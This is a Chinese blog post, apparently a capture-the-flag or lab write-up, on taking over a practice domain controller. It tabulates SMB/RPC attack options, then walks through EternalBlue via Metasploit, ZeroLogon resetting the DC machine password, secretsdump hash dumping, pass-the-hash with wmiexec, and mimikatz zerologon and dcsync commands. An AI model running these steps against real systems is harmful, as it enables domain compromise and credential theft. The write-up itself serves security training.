无境·U Lab_ZeroLogon练习(康复训练)

好久没有打靶场了,今天来练习一下,先打个简单点的:ZeroLogon,打个域控做做康复训练
信息收集
拿到一个IP,别的信息没有,当然从题目我们大概知道了考点,真实环境肯定不会告诉你考点的
OK,我管他这那的,我先扫一梭子看看什么情况

OK,没扫到漏洞,但是扫到了高危端口,134和445,那么这两个端口分别可以打什么呢?我们可以让ai来总结一下
首先是445端口:
| 漏洞/风险 | 说明 | 典型检测/利用 |
|---|---|---|
| MS17-010 EternalBlue | SMBv1 远程代码执行,影响 Win XP/7/2003/2008 等未打补丁系统 | nmap --script smb-vuln-ms17-010 -p445;MSF exploit/windows/smb/ms17_010_eternalblue |
| SMBGhost(CVE-2020-0796) | SMBv3 压缩机制 RCE/LPE,影响 Win10 1903/1909、Server 2019 | nmap --script smb-protocols;专用扫描脚本;利用可能导致蓝屏,需谨慎 |
| PrintNightmare(CVE-2021-34527) | 打印服务远程代码执行,常通过 SMB/Spooler 触发 | 检查 MS-RPRN 接口;有专门 PoC |
| 空会话/来宾访问 | 配置不当时可匿名枚举共享、用户、SID、组策略 | enum4linux-ng -A <IP>;crackmapexec smb <IP> -u '' -p '' --shares |
| 弱口令/口令喷洒/哈希传递 | 若存在弱口令,可直接登录 SMB;获得哈希后可 Pass-the-Hash | crackmapexec smb <IP> -u user -p pass;impacket-psexec |
| SMB 签名未强制 | 可导致 NTLM relay、中间人攻击 | nmap --script smb-security-mode |
| SMB relay + 强制认证 | 结合 PetitPotam/PrinterBug 强制目标认证,中继到 LDAP/AD CS 可域提权 | impacket-ntlmrelayx + PetitPotam.py |
然后是135端口:
| 漏洞/风险 | 说明 | 典型检测/利用 |
|---|---|---|
| MS03-026(DCOM RPC) | Windows 2000/XP/2003 等老系统远程代码执行 | 极老系统;MSF 有对应模块 |
| MS08-067(NetAPI) | 经典 RPC 服务漏洞,影响 XP/2003/Vista/2008 等,实际利用通常走 445 命名管道 | MSF exploit/windows/smb/ms08_067_netapi |
| ZeroLogon(CVE-2020-1472) | Netlogon RPC 协议漏洞,可重置域控机器账户密码,直接接管域控 | zerologon_tester.py |
| PetitPotam(CVE-2021-36942) | 通过 MS-EFSRPC 接口强制目标主机认证,无需凭据 | PetitPotam.py;常配合 NTLM relay |
| PrinterBug / SpoolSample | 通过 MS-RPRN 接口强制认证,类似 PetitPotam | rpcdump.py 检查 MS-RPRN;SpoolSample.exe |
| RPC 接口枚举 | 可发现大量攻击面(任务计划、注册表、DCOM 对象等) | impacket-rpcdump -p 135 <IP> |
| DCOM 横向移动 | 已获得凭据时,可通过 DCOM 对象执行命令(MMC20.Application、ShellWindows 等) | impacket-dcomexec |
445端口攻击
我们拿nmap扫一下,只能扫到17-010漏洞

永恒之蓝,老生常谈了,我们直接拿msf打一下试试,直接弹shell失败了,可能是因为这个操作系统版本比较高,或者是其他什么问题导致弹不出来,不过没关系,我们可以通过命令执行的方式写入一个用户,因为我们早就知道开了3389端口,所以直接加个用户进去rdp登录
1 | 添加用户hacker2进去 |
OK,这里是直接添加成功了

直接登录进去看看,flag在C盘
1 | rdesktop -u myd\\hacker2 -p 'P@ssw0rd' 192.168.111.100 |

135端口攻击
impacket 攻击
OK,直接拿脚本探测一下zerologon,我这里用的是这个脚本https://github.com/VoidSec/CVE-2020-1472
1 | python3 cve-2020-1472-exploit.py -n 域主机名 -t 域控IP |

这里直接把域控机器的密码置空了,然后我们可以用空密码dump一下所有hash
1 | python3 secretsdump.py 域名称/域控主机名\$@域控IP -no-pass |

这里可以拿到域内所有用户的hash,这里可以解一下administrator密码

OK,直接rdp进去

远程连接域控PTH攻击,这里用wmiexec
现在已经有了域管的hash了,就可以使用PTH攻击了,这里可以用wmiexec.py进行登录

同理,也可以登录到其他域内机器。
这个题目由于我们本身攻击机器也在域内,所以直接打域控即可,域内其实还有另一台机器是win10

mimikatz 攻击
所以,还有另一种手法是用mimikatz,这里模拟的是我们先拿到里域内机器win10
1 | mimikatz.exe "privilege::debug" "lsadump::zerologon /target:域控IP /account:域机器账户名" "exit" |

OK,可以发现漏洞是存在的,这里直接打
1 | mimikatz.exe "lsadump::zerologon /target:域控IP /ntlm /null /account:域机器名 /exploit" "exit" |

导出hash即可
1 | mimikatz.exe "lsadump::dcsync /csv /domain:myd.com /dc:域控的FQDN /user:administrator /authuser:域控主机名$ /authpassword:\"\" /authntlm" "exit" |

- Post title: 无境·U Lab_ZeroLogon练习(康复训练)
- Create time: 2026-08-10 16:13:29
- Post link: 2026/08/10/无境·U Lab_ZeroLogon 练习_upload/
- Copyright notice: All articles in this blog are licensed under BY-NC-SA unless stating additionally.
Comments